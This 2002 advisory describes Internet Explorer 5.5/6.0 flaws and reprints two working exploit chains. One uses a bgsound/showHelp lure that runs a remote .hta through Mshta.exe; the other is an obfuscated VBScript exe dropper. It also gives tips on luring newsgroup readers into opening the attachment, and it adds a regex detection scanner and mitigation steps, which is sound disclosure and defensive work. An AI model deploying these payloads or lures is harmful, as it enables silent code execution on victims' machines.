8th Feb 2002 [SBWID-5080]
COMMAND
IE may be fooled by remote site to download and run any file
SYSTEMS AFFECTED
Internet Explorer 5.5 and 6.0
PROBLEM
http-equiv [http://www.malware.com] posted:
Default installation of Internet Explorer 5.5 and 6.0 still allows us
to execute files on default installations of the target computer:
technically trivial silent delivery and installation of an executable
on the target computer.
We cobble together new and old components as follows:
1. Courtesy of Georgi Guninski
   see: [http://www.securityfocus.com/bid/1033]
2. Courtesy of Georgi Guninski
   see: [http://www.securityfocus.com/bid/2456]
3. Mshta.exe http://www.malware.com/foobar.hta
   see: [http://www.securitybugware.org/NT/1279.html]
Neither 1 nor 2 above can be exploited alone.
Nothing can be activated through the Temporary Internet Files unless
full path names are known for both showHelp calling and Click() of our
link.
However malware team was able to retrieve from the Temporary Internet
File a trojanised html, determine the location of it, write this
location out to a showHelp call and thereafter execute a specified
remote link.
Sample Exploit:
==============
We create a very simple *.html file like so:
<bgsound src="http://www.malware.com/malware.chm">
this will pull our *.chm into the Temporary Internet File
we then include the Guninski scripting to determine the location of
our *.html file like so:
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);
we then take that location information and write it to a simple html
form like so:
document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
technical note: it seems the myriad of patching to date does not make
it possible to pass the location directly to the showHelp call. It must
be written to the form which can then be automatically submitted:
setTimeout('document.malware.submit()',5000);
before we do all that we create our very simple malware.chm and include
our link object like so:
C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta
this is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta which
includes our executable. All without warning.
technical note: the possibility is excellent to repeat the entire
process above directly inside the *.chm file and drop an *.exe from
within the *.chm into the same Temporary Internet File. Using our
Guninski scripting to determine the location of the *.chm and write
that to the link parameter within it: value="'+path+'\\malware[1].exe"> and execute it.
So what happens?
===============
We construct our trojanised *.html file and send it off to our target
computer. This can be via mail or news. The recipient receives the mail
message and attached *.html file. We then convince our unsuspecting
recipient to open our *.html. This should be quite trivial,
particularly in news as the attached file is in fact nothing more than
a 500 byte html file.
Consider the following scenario in your favourite web design news
group:
Carefully note: there is a hardened security warning when attempting to
open attached *.html file. However our combination call for assistance
coupled with nothing more than a legitimate *.html file should prove
more than tempting:
screen shot: http://www.malware.com/duh.png 18KB
Why does it happen?
===================
Because our simple *.html file is an attachment, security has it
transfer to the Internet Temporary File for opening, under the security
browser's settings. However, precisely because it is physically opened
within the TIF, we can use our Guninski scripting to determine the
exact location, write that exact location to our form and call our
*.chm where it too resides.
Working Example below, includes harmless?? *.exe -- the *.chm is
hardcoded for win98. Due to pathetic technical reasons our *.chm is
off-site and may delay in transferring to the TIF and could possibly
fail, working example must be attached to mail or news.
UUEncoded
854 bytes
Update (11 February 2002)
======
dzzie [http://geocities.com/dzzie] posted another exploit, a proof of
concept of a chm exe dropper:
This works from Internet Temp files directory as well, all someone has
to do is choose the open option when they click a link to a chm file,
and they are done.
-------------------------------------------------
flow of events
-------------------------------------------------
1) chm opens
a) determines absolute path current folder
b) determines parent chm name (in case cached changes name)
c) detects winNT or win98 to work on both
2) chm name is used to auto generate vbs script data
abs path is used to auto generate html object data
script writes dynamically generated content to window
3) first object activated programmatically....vbs script is echoed
into existence into same folder as parent chm file
4) waits 1sec then activates echoed.vbs file...this vbs file
reads the parent .chm and extracts a hello world exe that is
appended onto the chm file.
5) after exe is written to disk vbs script then activates it
-------------------------------------------------------------
script below
-------------------------------------------------------------
msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'
function getChmAbsPath(){
    t=unescape(location.href)
    return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}
function getChmName(){
    l=unescape(location.href)
    chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
    t='Chr(92)+'
    for(i=0;i<chmName.length;i++){
        t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
    }
    return t.substring(0,t.length-1);
}
function getInterpreter(){
    if(navigator.userAgent.indexOf('NT') > 0){
        return 'cmd';
    }else{
        return 'command';
    }
}
vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
'set i=createobject(fso):'+
'set o=createobject(fso):'+
'set w=createobject(wsc):'+
'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
'infile=pf+' + getChmName() + ':'+
'outfile=pf+exename:'+
'OFFSET=XXXXXXX:'+
'Set ii=i.OpenTextFile(infile):'+
'Set oo=o.OpenTextFile(outfile,2,True):'+
'ii.Read OFFSET:'+
'While Not ii.AtEndOfStream:'+
'oo.Write Chr(Asc(ii.Read(1))):'+
'Wend:ii.close:oo.close:'+
'w.Run chr(34)+outfile+chr(34)'
hit='<OBJECT id=shortcut^ type="application/x-oleobject" '+
'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
'height=100><PARAM name="Command" value="ShortCut"> '+
'<PARAM name="Text" value="Text: "> '+
'<PARAM name="Item1" value=\',*\'> '+
'<PARAM name="Item2" value="273,1,1"></OBJECT> '
scriptPath = getChmAbsPath() + 'echoed.vbs'
cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'
function replace(h,i,c){
    h = h.split('^').join(i).split('*').join(c)
    return h
}
hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])
document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout("shortcut2.Click()",1000)
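For mail and news gateways that want to catch attachments of this shape, the following scanner flags the indicators of both chains above (the bgsound/showHelp/Mshta.exe chain in http-equiv's post and the HHCtrl ShortCut plus echoed VBScript dropper in dzzie's). It is an added example, not code from either post; the indicator names, the scoring rule and the sample inputs are my own constructions.

```python
import re

# Added example, not from the advisory: indicator scan for the two delivery
# chains described above. Patterns are loose on purpose; the originals vary
# quoting and path layout.
INDICATORS = [
    ("bgsound_chm", r'<bgsound[^>]*src\s*=\s*["\']?[^"\'>\s]+\.chm'),    # pulls a .chm into the TIF
    ("showhelp_call", r'showHelp\s*\('),                                  # opens a local .chm by path
    ("tif_path_probe", r'document\.URL|location\.href'),                  # learns its own cache path
    ("delayed_trigger", r'setTimeout\s*\([^)]*\.(?:submit|Click)\s*\('),  # auto-submit / auto-click
    ("mshta_remote", r'mshta\.exe\s*,\s*https?://'),                      # HH shortcut to a remote .hta
    ("hhctrl_shortcut", r'adb880a6-d8ff-11cf-9377-00aa003b7a11.*?value\s*=\s*["\']?ShortCut'),
    ("shell_interpreter", r'\b(?:cmd|command|wscript)\s*,'),             # ShortCut target is a shell
    ("vbs_dropper", r'OpenTextFile.*?AtEndOfStream.*?\.Run\b'),           # carve-and-run VBScript
]
COMPILED = [(name, re.compile(rx, re.I | re.S)) for name, rx in INDICATORS]
# Only these mean much on their own; path probes and timers are common in benign pages.
CHAIN_MARKERS = {"bgsound_chm", "showhelp_call", "mshta_remote", "hhctrl_shortcut", "vbs_dropper"}

def scan(content):
    """Return the matched indicator names and a verdict for one file's text."""
    hits = [name for name, rx in COMPILED if rx.search(content)]
    strong = CHAIN_MARKERS.intersection(hits)
    if strong and len(hits) >= 2:
        verdict = "suspicious"
    elif strong:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}

# Constructed samples (not the advisory's files); '.invalid' is a reserved TLD.
SAMPLE_HTML = (
    '<bgsound src="http://lure.invalid/lure.chm">'
    '<script>path=document.URL;'
    'document.write(\'<form name="f" action="javascript:window.showHelp('
    'document.forms[0].elements[0].value)">\');'
    'setTimeout(\'document.f.submit()\',5000);</script>'
)
SAMPLE_CHM_PAGE = (
    '<OBJECT classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'
    '<PARAM name="Command" value="ShortCut">'
    '<PARAM name="Item1" value=",cmd,/c echo x > a.vbs"></OBJECT>'
    '<script>t=unescape(location.href)</script>'
)
BENIGN = '<html><body><script>var here=location.href;</script></body></html>'

if __name__ == "__main__":
    for label, text in (("attachment", SAMPLE_HTML), ("chm page", SAMPLE_CHM_PAGE), ("benign", BENIGN)):
        print(label, scan(text))
```

A single hit on a chain marker (for example a lone showHelp call) lands in "review" rather than "suspicious", since Windows help pages legitimately use it.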
SOLUTION
1. Be aware of "innocent" *.html files in mail and news
2. Disable Active Scripting and ActiveX controls
3. Disable the HHCtrl ActiveX control,
   see: [http://www.kb.cert.org/vuls/id/25249]
4. Disable or remove Mshta.exe [although if an *.exe is embedded
   directly into the *.chm, this has no impact]